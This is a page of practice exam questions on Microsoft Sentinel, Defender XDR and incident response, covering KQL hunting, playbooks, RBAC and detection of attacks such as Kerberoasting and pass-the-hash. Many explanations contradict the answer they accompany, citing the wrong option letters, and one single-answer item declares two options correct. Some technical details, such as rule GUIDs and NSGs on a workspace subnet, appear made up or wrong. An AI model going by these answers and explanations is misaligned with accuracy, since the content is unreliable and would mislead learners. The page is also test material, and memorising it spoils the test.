Option A is wrong because 'Block untrusted and unsigned processes that run from USB' (GUID: b2b3f03d-6a4c-4b7e-8f6f-0c7f8f8e8f8f) only blocks processes launched from USB removable drives, not all executable files regardless of source. Option B is wrong because 'Block Office applications from creating executable content' (GUID: 3b576869-a4ec-4529-8536-b80a7769e899) specifically targets Office apps (Word, Excel, etc.) creating executable content, not all executable files from any source. Option C is wrong because 'Block credential stealing from the Windows local security authority subsystem (lsass.exe)' (GUID: 9e6c4e1f-7d60-472f-b1a0-3f2d6d7e8f9a) is an ASR rule that protects LSASS from credential dumping attacks, not a rule that evaluates executable files based on prevalence, age, or trusted list criteria.

486
MCQeasy

Refer to the exhibit. You deploy this ARM template to deploy a saved search in a Microsoft Sentinel workspace. After deployment, the saved search does not appear in Sentinel. What is the most likely reason?

A.The query syntax is invalid.
B.The resource type is incorrect.
C.The name parameter is incorrectly formatted.
D.The apiVersion is outdated for saved searches in Sentinel.
AnswerD

Newer apiVersions are required for Sentinel saved searches.

Why this answer

The apiVersion specified in the ARM template is outdated for saved searches in Microsoft Sentinel. Saved searches require a specific apiVersion (e.g., '2021-04-01' or later) that supports the 'Microsoft.OperationalInsights/workspaces/savedSearches' resource type. An outdated apiVersion can cause the deployment to fail silently or not register the saved search in Sentinel, even if the template syntax is otherwise valid.

Exam trap

The trap here is that candidates assume the apiVersion is just a formality and focus on syntax or resource type errors, but Microsoft specifically tests that you know saved searches in Sentinel require a recent apiVersion (e.g., '2021-04-01' or later) to be properly registered.

How to eliminate wrong answers

Option A is wrong because the query syntax being invalid would typically cause a deployment error or a warning, not a silent failure where the saved search does not appear; the ARM template would still deploy but the search might not run correctly. Option B is wrong because the resource type 'Microsoft.OperationalInsights/workspaces/savedSearches' is correct for saved searches in Sentinel; an incorrect resource type would result in a deployment error. Option C is wrong because the name parameter being incorrectly formatted would cause a validation error during deployment, preventing the template from deploying at all, not a silent absence of the saved search.

487
MCQhard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. During an incident, you need to automatically disable a compromised Azure VM from the network. Which playbook action should you use?

A.Apply an Azure Policy to deny network changes.
B.Create an Azure Firewall rule to block the VM's IP.
C.Add a rule to the VM's network security group to deny all traffic.
D.Remove the VM's role assignment from Azure RBAC.
AnswerC

NSG rules can isolate the VM from network traffic.

Why this answer

Option A is correct because you can use Azure Network Security Group to deny all inbound/outbound traffic to the VM. Option B is wrong because Azure RBAC does not affect network access. Option C is wrong because Azure Policy does not apply runtime network controls.

Option D is wrong because Azure Firewall rules are not VM-specific.

488
MCQhard

Your organization uses Microsoft Sentinel. You need to ensure that only specific IP addresses from your corporate network can access the Sentinel workspace via the Azure portal. What should you configure?

A.Configure network security groups (NSGs) on the subnet hosting the Log Analytics workspace.
B.Configure a conditional access policy in Microsoft Entra ID.
C.Use Azure Firewall to restrict outbound traffic from the workspace.
D.Enable Azure Private Link for the workspace.
AnswerA

NSGs can filter traffic by source IP address.

Why this answer

Option B is correct because Azure RBAC controls access to the workspace, but network access control is done via network security groups or Azure Firewall. Option A is wrong because Conditional Access policies apply to user authentication, not network-level access. Option C is wrong because Private Link restricts access to private network, not specific IPs.

Option D is correct because network security groups (NSGs) can filter inbound traffic to the workspace's subnet.

489
MCQmedium

During an incident response, a security analyst identifies that a user's account was used to access sensitive data from an anomalous location. The analyst needs to immediately prevent further access from that account while preserving forensic data. Which action should the analyst take?

A.Revoke the user's current sessions in Microsoft Entra ID.
B.Block the IP address of the anomalous location in the firewall.
C.Disable the user account in Microsoft Entra ID.
D.Enable multi-factor authentication (MFA) for the user.
AnswerC

Disabling the account prevents all access and preserves data.

Why this answer

Disabling the user account in Microsoft Entra ID stops access immediately and preserves data. Option A only revokes sessions; Option C is too broad; Option D affects all users.

490
Drag & Dropmedium

Arrange the steps to configure an Azure Sentinel data connector for Windows Security Events via Azure Monitor Agent in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

The Azure Monitor Agent uses DCRs to define data sources; the agent must be installed, then a DCR is created with the security events source, associated with the workspace, and finally verified.

491
Multi-Selecteasy

A security analyst is using Microsoft Sentinel to hunt for signs of a brute-force attack against Azure AD. Which TWO data sources are most relevant for this hunt?

Select 2 answers
A.AzureActivity
B.SigninLogs
C.OfficeActivity
D.AuditLogs
E.AADNonInteractiveUserSignInLogs
AnswersB, E

Contains sign-in events including failures, which are key for brute-force detection.

Why this answer

Option A (SigninLogs) contains successful and failed sign-in attempts. Option B (AuditLogs) logs administrative actions, not sign-ins. Option C (AADNonInteractiveUserSignInLogs) includes non-interactive sign-ins, which may also be targeted.

Option D (AzureActivity) logs resource operations. Option E (OfficeActivity) logs SharePoint/Exchange activities.

492
Multi-Selecthard

Which THREE data sources can be used in Microsoft Sentinel for threat hunting to detect unusual authentication patterns? (Choose three.)

Select 3 answers
A.SecurityEvent (Windows Event Logs)
B.AADNonInteractiveUserSignInLogs
C.CommonSecurityLog
D.OfficeActivity (Office 365)
E.SigninLogs (Microsoft Entra ID)
AnswersA, B, E

Contains logon events (Event ID 4624, 4625).

Why this answer

Option A is correct because SigninLogs from Microsoft Entra ID contain authentication data. Option B is correct because SecurityEvent (Windows Event Log) contains logon events. Option D is correct because AADNonInteractiveUserSignInLogs contain non-interactive sign-ins.

Option C is wrong because OfficeActivity contains audit logs, not authentication. Option E is wrong because CommonSecurityLog is for network devices, not authentication.

493
MCQhard

You are hunting for signs of ransomware using Microsoft Defender XDR's advanced hunting. Which query pattern would best identify a process that encrypts many files in a short time?

A.DeviceFileEvents | summarize Duration = max(Timestamp)-min(Timestamp) by DeviceName, InitiatingProcessFileName | where Duration < 1h
B.DeviceFileEvents | where ActionType == 'FileModified' | summarize Count = count() by DeviceName, InitiatingProcessFileName, bin(Timestamp, 5m) | where Count > 100
C.DeviceProcessEvents | where FileName in ('powershell.exe', 'wscript.exe') | summarize by DeviceName
D.DeviceFileEvents | summarize Count = count() by DeviceName | where Count > 1000
AnswerB

High file modification count per process in a short window is indicative of ransomware.

Why this answer

Option A is correct because it counts file modifications per process and device, then filters for high counts. Option B is wrong because it focuses on process creations, not file modifications. Option C is wrong because it measures duration, not count.

Option D is wrong because it only groups by device, missing the process responsible.

494
Multi-Selecteasy

Your SOC team needs to ensure that all incidents in Microsoft Sentinel are assigned to an analyst within 30 minutes of creation. Which TWO configurations should you implement?

Select 2 answers
A.Create a playbook that uses the Update Incident action to set the owner field.
B.Set up a playbook that sends an email to the SOC manager when an incident is created.
C.Create an automation rule that triggers when an incident is created and sets the owner.
D.Configure a Microsoft Teams connector to post incidents to a channel.
E.Modify the analytics rule to include a custom details field for analyst name.
AnswersA, C

Playbooks can update incident properties including owner.

Why this answer

Option A (Automation rules) can automatically assign incidents based on criteria. Option D (Playbooks) can trigger on incident creation and assign. Option B is for collaboration, not assignment.

Option C is for email notification, not assignment. Option E is for analytics, not assignment.

495
MCQmedium

Your organization uses Microsoft Defender for Endpoint. A user reports that their device is running slowly and exhibiting unusual network activity. You run a live response session and find a suspicious process running. Which action should you take first to contain the threat?

A.Collect a full memory dump for analysis.
B.Terminate the suspicious process.
C.Isolate the device from the network.
D.Add a firewall rule to block outbound traffic from the device.
AnswerC

Isolating the device prevents lateral movement and further damage.

Why this answer

Option A is correct because isolating the device immediately prevents the threat from spreading to other devices while you investigate further. Option B is wrong because terminating the process alone does not prevent re-execution. Option C is wrong because collecting a memory dump does not contain the threat.

Option D is wrong because adding a firewall rule is too slow and may not block all lateral movement.

496
MCQhard

Refer to the exhibit. You are hunting for PowerShell used to launch cmd.exe. The query is intended to find cmd.exe processes that occurred after the first PowerShell execution on the same device. However, it returns no results. What is the most likely issue?

A.The query should filter on a specific time range instead of using FirstSeen.
B.The join key should be DeviceName instead of DeviceId.
C.The FirstSeen variable is a table, not a scalar value; 'between' cannot be used with a table.
D.The join type should be innerunique, not leftsemi.
AnswerC

The summarize min(Timestamp) returns a table with a column, not a scalar; 'between' requires a scalar.

Why this answer

Option D is correct because the subquery uses 'min(Timestamp)' which returns a scalar, but the 'between' operator expects two datetime values. Option A is wrong because the join is leftsemi, which doesn't include fields from the right side. Option B is wrong because the query does not filter on a specific time range; it uses the first seen time.

Option C is wrong because the join column is DeviceId, which should match.

497
MCQeasy

A company uses Microsoft Defender for Cloud. They need to continuously assess the compliance of their Azure resources against the CIS benchmark. Which feature should they enable?

A.Regulatory compliance dashboard
B.Secure Score
C.Azure Policy
D.Just-In-Time VM access
AnswerA

Correct. The Regulatory compliance dashboard includes built-in initiatives for standards like CIS, allowing continuous compliance monitoring.

Why this answer

The Regulatory Compliance dashboard in Defender for Cloud provides built-in compliance standards such as CIS, SOC 2, and Azure CIS. By assigning the appropriate initiative, the dashboard continuously scans resources and reports compliance status. Secure Score is an aggregated risk score, not a compliance standard.

Azure Policy is the underlying service used to enforce policies, but the feature that presents compliance is the dashboard. Just-in-Time VM access is a security control, not a compliance assessment tool.

498
MCQhard

During a ransomware investigation, a security analyst finds that multiple files on a file server have been encrypted. The server runs Microsoft Defender for Cloud and has been onboarded to Microsoft Sentinel. Which data source in Sentinel would provide the most granular information about the file encryption events?

A.Microsoft Defender for Cloud (Azure Defender) alerts
B.Azure Activity Log
C.Windows Security Events via MMA
D.Sysmon events via Azure Monitor Agent
AnswerA

Defender for Cloud can detect file encryption patterns and provide alerts with detailed process and file information.

Why this answer

Microsoft Defender for Cloud (formerly Azure Defender) provides file integrity monitoring and security events at the OS level. Sysmon via AMA would need specific configuration; Windows Security Events may not capture encryption; Azure Activity Log is for control plane events.

499
MCQeasy

Your organization uses Microsoft Sentinel. The SOC manager wants to track the average time to triage incidents. You need to create a report that shows this metric. What should you use?

A.Create a workbook that uses KQL to query incident data and display the average time.
B.Create a playbook that sends a report via email.
C.Create an automation rule that logs the triage time to a custom table.
D.Create an analytics rule that calculates the time to triage.
AnswerA

Correct: Workbooks can visualize data from tables.

Why this answer

Option C is correct because workbooks can query the SecurityIncident table and compute average time. Option A is wrong because analytics rules generate alerts, not reports. Option B is wrong because automation rules don't create reports.

Option D is wrong because playbooks are for automation, not reporting.

500
MCQmedium

You are responding to a data exfiltration incident involving a user who copied sensitive files to a personal cloud storage service. The files were accessed from the user's managed device. Which Microsoft Defender for Cloud Apps activity policy should you create to detect similar future incidents?

A.An anomaly detection policy that flags impossible travel.
B.An activity policy that detects uploads to personal cloud storage services.
C.A file policy that detects files shared with external users.
D.An app discovery policy that identifies new cloud apps used in the organization.
AnswerB

Activity policies monitor specific activities like file uploads to non-corporate apps.

Why this answer

Option C is correct because an activity policy can monitor file uploads to non-corporate cloud apps. Option A is wrong because a file policy applies to files already in cloud apps. Option B is wrong because an anomaly detection policy is for unusual behavior, not specific uploads.

Option D is wrong because an app discovery policy identifies shadow IT apps, not specific activities.

501
MCQeasy

You are investigating a ransomware incident in Microsoft Sentinel. The incident contains multiple alerts. You need to group related alerts under the same incident to reduce alert fatigue. What should you do?

A.Enable User and Entity Behavior Analytics (UEBA).
B.Create a new analytics rule to combine alerts.
C.Use an automation rule to merge incidents.
D.Configure incident creation rules in the analytics rule.
AnswerD

Incident creation rules allow grouping alerts into incidents based on entities.

Why this answer

Option A is correct because incident creation rules in Sentinel automatically group alerts by entities and time window. Option B is wrong because analytics rules create alerts, not incidents. Option C is wrong because automation rules trigger playbooks, not grouping.

Option D is wrong because entity behavior analytics is a separate feature.

502
MCQmedium

Your organization has Microsoft Sentinel deployed in a single workspace. You need to implement role-based access control (RBAC) so that only senior analysts can modify analytics rules, while junior analysts can only view incidents. You have created custom roles in Azure. You assign the junior analysts the 'Microsoft Sentinel Reader' role. However, you find that junior analysts can still create and modify analytics rules. What is the most likely reason?

A.The 'Microsoft Sentinel Reader' role does not exist; you used the wrong role.
B.The junior analysts are members of a group that has a role assignment on the workspace.
C.The junior analysts have been assigned the 'Contributor' role on the resource group containing the workspace.
D.You need to create a custom role instead of using built-in roles.
AnswerC

Contributor role at a higher scope overrides the Reader role on the workspace.

Why this answer

Option D is correct because RBAC assignments can be overridden if the user is also assigned a higher role at a higher scope (e.g., subscription). Option A is incorrect because there is no 'Analytics Rules' specific role. Option B is incorrect because custom roles are allowed.

Option C is incorrect because inherited permissions do not automatically grant write access.

503
Multi-Selectmedium

Which TWO of the following are valid response actions that can be taken on a device from Microsoft Defender for Endpoint? (Choose two.)

Select 2 answers
A.Quarantine email
B.Disable user account
C.Run antivirus scan
D.Reset user password
E.Isolate device from network
AnswersC, E

Running antivirus scan is a standard response action.

Why this answer

The correct answers are A and E. Isolation and Run antivirus scan are standard response actions. Option B is wrong because password reset is not a device action.

Option C is wrong because disabling the user is an identity action. Option D is wrong because quarantining an email is a Microsoft 365 Defender action.

504
MCQhard

Your organization has Microsoft Sentinel with UEBA enabled. An incident is generated for a user with high risk score. You need to identify if the user's recent behavior deviates from their baseline. Which Sentinel feature should you use?

A.A custom hunting query using the BehaviorAnalytics table.
B.The user's Azure AD sign-in logs.
C.The UEBA timeline in the entity page.
D.The incident investigation graph.
AnswerC

UEBA timeline shows baseline deviations.

Why this answer

The UEBA timeline in the entity page is the correct feature because it provides a chronological view of a user's activities, including deviations from their established behavioral baseline. When UEBA is enabled, Sentinel profiles normal behavior for each user and flags anomalies; the timeline directly visualizes these deviations, such as unusual login times, locations, or resource access, which aligns with the need to identify if recent behavior deviates from the baseline.

Exam trap

The trap here is that candidates often confuse the BehaviorAnalytics table (option A) as the primary tool for deviation analysis, overlooking that the UEBA timeline is the purpose-built, no-code interface for visualizing baseline deviations directly on the entity page.

How to eliminate wrong answers

Option A is wrong because a custom hunting query using the BehaviorAnalytics table, while capable of surfacing UEBA data, is not the dedicated feature for quickly viewing a user's behavioral timeline and deviations; it requires writing and executing a KQL query, which is less efficient than the built-in timeline. Option B is wrong because Azure AD sign-in logs only show authentication events and do not incorporate UEBA's behavioral baseline analysis or deviations; they lack the contextual anomaly scoring and timeline of behavioral changes. Option D is wrong because the incident investigation graph focuses on mapping relationships between entities and alerts within an incident, not on displaying a user's behavioral timeline or baseline deviations.

505
MCQmedium

You are threat hunting in Microsoft Defender XDR for signs of Kerberoasting. Which hunting query would be most effective in identifying Kerberoasting activity?

A.IdentityDirectoryEvents | where AccountDomain == 'Service Accounts'
B.IdentityQueryEvents | where QueryTarget like 'TGS' | summarize count() by InitiatingAccount, IPAddress | where count_ > 10
C.IdentityLogonEvents | where Application == 'Kerberos' and Result == 'Failed'
D.IdentityLogonEvents | where LogonType == 'Failed'
AnswerB

Anomalous TGS queries are a key indicator of Kerberoasting.

Why this answer

Option C is correct because Kerberoasting typically involves anomalous requests for Kerberos service tickets (TGS) by a single user to many services. Option A is incorrect because failed logins are not specific to Kerberoasting. Option B is incorrect because it focuses on service accounts, not the attacker's activity.

Option D is incorrect because ticket decryption failures are not the primary indicator.

506
MCQmedium

During an incident response, you identify that a user's account was used to sign in from an unusual location. You need to contain the incident immediately. What should you do first?

A.Reset the user's password.
B.Disable the user account in Microsoft Entra ID.
C.Revoke the user's refresh tokens.
D.Create a Conditional Access policy to block the user.
AnswerB

Disabling the account immediately stops all sign-ins, containing the incident.

Why this answer

Option A is correct because disabling the user account in Microsoft Entra ID is the fastest way to stop all sign-ins, containing the incident. Option B is wrong because resetting password alone does not prevent the attacker from using existing tokens. Option C is wrong because revoking sessions does not block future sign-ins.

Option D is wrong because Conditional Access policies cannot block a specific user instantly.

507
MCQmedium

Your organization has a Microsoft Sentinel workspace that ingests logs from multiple sources. You need to implement a process to review and approve changes to analytics rules before they are deployed to production. What should you use?

A.Create a playbook that emails the SOC manager when an analytics rule is modified.
B.Use a workbook to track changes to analytics rules.
C.Configure Microsoft Sentinel repository integration with Azure DevOps and use branch policies for approval.
D.Export analytics rules to a notebook for manual review.
AnswerC

CI/CD with approval workflows.

Why this answer

Option A is correct because Microsoft Sentinel's repository integration with Azure DevOps or GitHub supports CI/CD with pull requests for approval. Option B is wrong because playbooks are for automation, not rule management. Option C is wrong because workbooks are for visualization.

Option D is wrong because notebooks are for advanced analytics.

508
Multi-Selecteasy

Which TWO are immediate containment actions in Microsoft Sentinel for a compromised Azure VM? (Choose two.)

Select 2 answers
A.Install anti-malware extension
B.Apply an NSG to block all inbound and outbound traffic
C.Reset the VM administrator password
D.Initiate a VM backup
E.Stop the VM using an automation rule
AnswersB, E

NSG blocks network communication immediately.

Why this answer

Option A is correct: Applying a network security group (NSG) to block traffic can be automated via playbook. Option C is correct: Stopping the VM prevents further malicious activity. Option B is wrong because VM extensions may not stop the attack.

Option D is wrong because resetting password does not stop processes. Option E is wrong because initiating backup is not containment.

509
MCQhard

You are responding to a data exfiltration incident in Microsoft Sentinel. The attacker used a PowerShell script to upload data to an external storage account. You need to identify the specific storage account used. Which KQL query should you use in the AzureActivity table?

A.OperationName == 'Get Storage Account Properties'
B.OperationName == 'Storage Blob Upload'
C.OperationName == 'Create or Update Storage Account'
D.OperationName == 'List Storage Account Keys'
AnswerB

Storage Blob Upload is the operation that corresponds to uploading data to a blob.

Why this answer

Option C is correct because Storage Blob Upload is the operation for uploading data. Option A is wrong because List Storage Keys is for managing storage account keys. Option B is wrong because Create or Update Storage Account is for provisioning.

Option D is wrong because Get Storage Account Properties is read-only.

510
MCQhard

A SOC team uses Microsoft Sentinel with Microsoft Defender XDR integration. An incident is created from a Defender for Endpoint alert. The analyst wants to run a KQL query across all affected devices without creating a new analytics rule. How can the analyst achieve this?

A.Modify the analytics rule that created the incident.
B.Use the incident's Logs blade to run a KQL query.
C.Use the Microsoft Sentinel Hunting blade.
D.Create a new workbook.
AnswerB

Logs blade allows ad-hoc querying within the incident context.

Why this answer

Option B is correct because the incident's Logs blade allows running ad-hoc KQL queries. Option A is wrong because the analytics rule is for scheduled queries. Option C is wrong because the workbook is for visualizations.

Option D is wrong because the hunting blade is for proactive hunting, not incident-specific.

511
Multi-Selecteasy

Your organization uses Microsoft Defender XDR (formerly Microsoft 365 Defender). You need to configure role-based access control (RBAC) for the security team. Which TWO built-in roles can be assigned in Microsoft 365 Defender to manage incidents and alerts?

Select 2 answers
A.Global Administrator
B.Compliance Administrator
C.Security Operator
D.Security Administrator
E.Security Reader
AnswersC, D

Security Operators can view and respond to incidents and alerts.

Why this answer

Option A and B are correct as these roles can manage incidents and alerts. Option C is wrong because Security Reader is read-only. Option D is wrong because Compliance Administrator manages compliance.

Option E is wrong because Global Administrator is too broad.

512
MCQeasy

A company wants to continuously assess the compliance of their Azure resources against the CIS (Center for Internet Security) benchmark. Which Microsoft Defender for Cloud feature should they use?

A.Regulatory compliance dashboard
B.Secure score
C.Azure Policy
D.Workload protections
AnswerA

This dashboard allows you to track compliance against built-in standards like CIS, and you can assign the CIS initiative to your subscriptions.

Why this answer

The Regulatory compliance dashboard in Microsoft Defender for Cloud provides pre-built assessments and continuous monitoring against specific compliance standards, including the CIS benchmark. It automatically evaluates Azure resources against CIS controls and displays compliance status, making it the correct feature for this requirement.

Exam trap

The trap here is that candidates often confuse Secure score (which measures overall security hygiene) with the Regulatory compliance dashboard (which measures adherence to specific standards like CIS), leading them to select Secure score when the question explicitly asks for compliance against a benchmark.

How to eliminate wrong answers

Option B is wrong because Secure score measures overall security posture based on implemented security controls, not specific compliance with a regulatory standard like CIS. Option C is wrong because Azure Policy is a service for creating, assigning, and managing policies that enforce rules on resources, but it does not natively include pre-built CIS benchmark assessments; the Regulatory compliance dashboard leverages Azure Policy initiatives but provides the compliance-specific dashboard. Option D is wrong because Workload protections refer to advanced threat detection capabilities for workloads (e.g., servers, databases), not compliance assessment against benchmarks like CIS.

513
Multi-Selecthard

Which THREE elements are required to create a custom detection rule in Microsoft Sentinel?

Select 3 answers
A.An alert threshold
B.A KQL query
C.Entity mapping for incident creation
D.An automation playbook
E.A schedule for the query
AnswersB, C, E

The query defines the detection logic.

Why this answer

A custom detection rule requires a KQL query to define logic, a schedule to run the query, and entity mapping to link results to incidents. Alert threshold is optional; playbook is separate.

514
MCQhard

An administrator creates a Microsoft Defender for Cloud Apps policy to block unsanctioned cloud storage apps. Despite the policy, users can still access these apps. What is the most likely cause?

A.The action type 'Block' is incorrect; it should be 'Alert'
B.The policy requires a 'Device' filter to apply to all users
C.The filter uses 'Unsanctioned' tag, but apps are tagged 'Sanctioned'
D.The policy mode is set to 'Monitor', which only alerts and does not block
AnswerD

Monitor mode doesn't enforce actions; it must be set to 'Block' or 'Govern'.

Why this answer

The policy mode is set to 'Monitor' instead of 'Govern' or 'Block'. In Microsoft Defender for Cloud Apps, policies in 'Monitor' mode only generate alerts, not block. The action 'Block' is defined but the policy mode must be set to 'Block' or 'Govern' to enforce.

The filter and actions are correct.

515
MCQmedium

Refer to the exhibit. You have a KQL query in a Microsoft Sentinel analytics rule. The rule is not generating incidents even though there are 'Suspicious sign-in' alerts from non-contoso.com users. What is the most likely issue?

A.The 'extend' line is incorrectly parsing the entity.
B.The query is querying the wrong table. 'Suspicious sign-in' alerts may be in a different table.
C.The 'where' clause using !endswith is incorrect.
D.The query does not filter by AlertName correctly.
AnswerB

Sign-in alerts are often in SigninLogs or other tables.

Why this answer

Option B is correct because the query is likely querying the 'Alert' table, but 'Suspicious sign-in' alerts from non-contoso.com users are generated by Microsoft Defender for Identity or Azure AD Identity Protection and stored in the 'SecurityAlert' table (or 'AlertEvidence' in the new schema). The rule's query must reference the correct table to retrieve these alerts; otherwise, no matching records are found, and no incidents are created.

Exam trap

The trap here is that candidates assume all security alerts are stored in a single 'Alert' table, but Microsoft Sentinel separates alerts into multiple tables (e.g., 'SecurityAlert', 'AlertEvidence', 'SigninLogs') based on the source service, and the exam tests your knowledge of which table corresponds to which alert type.

How to eliminate wrong answers

Option A is wrong because the 'extend' line is used to add or modify columns, not to parse entities; entity parsing is done via the 'EntityMapping' section of the analytics rule, not within the KQL query itself. Option C is wrong because the 'where' clause using '!endswith' is syntactically correct for filtering out domains that do not end with a specific suffix (e.g., 'contoso.com'); the logic is valid if the field contains the full user principal name. Option D is wrong because the query does not need to filter by AlertName if the rule is triggered by the presence of any alert from the 'Suspicious sign-in' category; the rule's trigger condition is based on the query returning results, not on a specific alert name filter.

516
MCQmedium

You are reviewing an alert rule in Microsoft Sentinel created via ARM template. What is the primary purpose of this rule?

A.To send an alert when a sign-in with high risk level is detected.
B.To isolate the user's device from the network.
C.To automatically block the user from signing in.
D.To create an incident in Microsoft Sentinel.
AnswerA

The rule triggers on high risk sign-ins and sends an alert via the action group.

Why this answer

Option B is correct because the rule triggers when a sign-in risk level is high, sending an alert to an action group. Option A is wrong because it does not block the user. Option C is wrong because it creates an alert, not an incident directly.

Option D is wrong because it does not isolate devices.

517
Multi-Selectmedium

Which TWO tools in Microsoft Defender XDR provide automated investigation and response capabilities?

Select 2 answers
A.Microsoft Defender for Endpoint
B.Microsoft Defender for Office 365
C.Microsoft Defender for Identity
D.Microsoft Defender for Cloud Apps
E.Microsoft Defender for Cloud
AnswersA, B

Defender for Endpoint includes AIR for endpoint incidents.

Why this answer

Automated investigation and response (AIR) is available in Defender for Office 365 and Defender for Endpoint. Defender for Identity and Defender for Cloud Apps have some automation but not full AIR. Defender for Cloud is separate.

518
MCQmedium

Your Microsoft Sentinel workspace is ingesting logs from multiple sources. You notice that the data ingestion cost is higher than expected. You want to reduce costs without losing security value. Which action should you take?

A.Reduce the retention period for all data to 30 days.
B.Switch the pricing tier from Capacity Reservations to Pay-as-you-go.
C.Disable analytics rules that generate high volume of alerts.
D.Configure basic logs ingestion for verbose data sources such as firewall logs.
AnswerD

Basic logs are cheaper and still searchable for incident response.

Why this answer

Option C is correct because using basic logs for high-volume, low-value data reduces costs while retaining the ability to search it. Option A is wrong because reducing retention for all tables might cause loss of important data. Option B is wrong because disabling analytics rules reduces detection capabilities.

Option D is wrong because changing to Pay-as-you-go might increase costs if volume is high.

519
Multi-Selecthard

An analyst writes an advanced hunting query to investigate a suspicious executable that initiated outbound connections. Which two Microsoft 365 Defender tables are most relevant? (Choose 2.)

Select 2 answers
A.DeviceProcessEvents.
B.DeviceNetworkEvents.
C.EmailAttachmentInfo.
D.IdentityInfo.
AnswersA, B

This table contains process creation and command-line details.

Why this answer

DeviceProcessEvents is correct because it records process creation events, including the executable that initiated the outbound connection. By querying this table, you can identify the suspicious executable's name, command line, and parent process, which is essential for tracing the origin of the malicious activity.

Exam trap

The trap here is that candidates may mistakenly choose EmailAttachmentInfo thinking the executable arrived via email, but the question focuses on the executable's outbound connections, not its delivery method.

520
MCQhard

An organization uses Microsoft Sentinel with the Microsoft Defender XDR connector. An incident is generated for a user who is suspected of being compromised. The analyst wants to automatically block the user's sign-ins using a playbook. Which connector should the playbook use?

A.Microsoft Sentinel connector
B.Microsoft 365 Defender connector
C.Microsoft Entra ID connector
D.Microsoft Teams connector
AnswerC

The Microsoft Entra ID connector (Azure AD) can perform actions such as blocking user sign-ins or revoking sessions.

Why this answer

Microsoft Entra ID (Azure AD) connector allows updating user risk or disabling account. Microsoft 365 Defender is for alerts; Teams is for notifications; Sentinel connector is for ingestion.

521
MCQhard

Your organization uses Microsoft Defender XDR. You need to configure a custom detection rule that runs every hour and alerts when a specific process is executed on multiple devices within 10 minutes. Which type of rule should you create?

A.Hunting query saved as a detection
B.Behavioral rule
C.Custom detection rule
D.Advanced hunting query
AnswerC

Custom detection rules support scheduled queries with time-based aggregations.

Why this answer

Custom detection rules in Microsoft Defender XDR allow you to create scheduled queries that run on a schedule (e.g., every hour) and can use aggregations like count of devices within a time window. Option A is correct. Option B is wrong because hunting queries are one-time or scheduled but not custom detection rules.

Option C is wrong because advanced hunting is a query interface, not a rule type. Option D is wrong because behavioral rules are for specific behaviors, not scheduled queries.

522
MCQmedium

A company uses Microsoft Defender for Cloud to manage security across multiple Azure subscriptions. They want to automatically remediate non-compliant resources when a policy violation is detected—for example, enabling encryption on a storage account that has it disabled. Which feature should they configure?

A.Regulatory compliance dashboard
B.Azure Policy's DeployIfNotExists effect
C.Adaptive network hardening
D.Just-In-Time VM access
AnswerB

DeployIfNotExists policies automatically deploy the required configuration (e.g., enable encryption) when a non-compliant resource is created or updated.

Why this answer

Azure Policy's DeployIfNotExists effect is the correct feature because it automatically deploys a resource configuration (such as enabling encryption on a storage account) when a policy evaluation detects non-compliance. This effect runs during policy evaluation and remediation tasks, ensuring that the resource is brought into compliance without manual intervention. It is specifically designed for automated remediation of non-compliant resources in Azure, aligning with the requirement to fix violations like missing encryption.

Exam trap

The trap here is that candidates may confuse the Regulatory compliance dashboard (a monitoring tool) with an automated remediation feature, overlooking that Azure Policy's DeployIfNotExists effect is the actual mechanism for enforcing and fixing compliance violations.

How to eliminate wrong answers

Option A is wrong because the Regulatory compliance dashboard is a reporting and monitoring tool that displays compliance status against standards (e.g., CIS, NIST), but it does not perform automated remediation of non-compliant resources. Option C is wrong because Adaptive network hardening provides recommendations to tighten network security group rules based on traffic patterns, not automated remediation of policy violations like encryption settings. Option D is wrong because Just-In-Time VM access reduces attack surface by controlling inbound traffic to VMs on demand, but it does not address policy compliance or resource configuration remediation.

523
MCQmedium

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. You need to ensure that security alerts from Defender for Cloud are automatically ingested into Sentinel. What should you configure?

A.Enable diagnostic settings on the Defender for Cloud subscription.
B.Configure the 'Azure Activity' data connector.
C.Create an automation rule in Sentinel to fetch alerts from Defender for Cloud.
D.Add the 'Microsoft Defender for Cloud' data connector in Microsoft Sentinel.
AnswerD

The data connector ingests security alerts from Defender for Cloud.

Why this answer

Sentinel can ingest alerts from Defender for Cloud via a data connector specifically for that purpose. Option B is correct. Option A is wrong because diagnostic settings export logs, not alerts directly.

Option C is wrong because automation rules work on incidents, not ingestion. Option D is wrong because the connector is for Azure Activity, not Defender for Cloud alerts.

524
Multi-Selecthard

Which THREE of the following are indicators of a potential pass-the-hash attack that a threat hunter should investigate in Microsoft Defender for Identity?

Select 3 answers
A.High volume of TGS requests from a single user
B.Multiple failed logon attempts followed by a successful logon from the same IP
C.Anomalous NTLM authentication from a domain controller
D.Event ID 4624 with LogonType 9 (NewCredentials) from a non-privileged account
E.Anomalous spike in CPU usage on domain controllers
AnswersB, C, D

This pattern suggests credential cracking or pass-the-hash.

Why this answer

Options A, B, and C are correct. Anomalous NTLM authentication from a domain controller is suspicious because DCs typically do not initiate NTLM requests. Multiple failed logon attempts followed by a success from the same IP indicates credential reuse.

Event ID 4624 with logon type 9 (NewCredentials) often indicates pass-the-hash. Option D is incorrect because TGS requests are related to Kerberos, not pass-the-hash. Option E is incorrect because high resource usage is not specific to pass-the-hash.

525
Multi-Selectmedium

Which TWO tables in Microsoft Defender XDR advanced hunting provide information about user authentication events?

Select 2 answers
A.AlertInfo
B.AADSignInEventsBeta
C.EmailEvents
D.IdentityLogonEvents
E.DeviceNetworkEvents
AnswersB, D

Contains Azure AD sign-in events.

Why this answer

Options A and D are correct. A is correct because AADSignInEventsBeta contains Azure AD sign-ins. D is correct because IdentityLogonEvents contains on-premises AD logons.

B is incorrect because DeviceNetworkEvents is for network events. C is incorrect because EmailEvents is for email. E is incorrect because AlertInfo is for alerts.

Page 6

Page 7 of 22

Page 8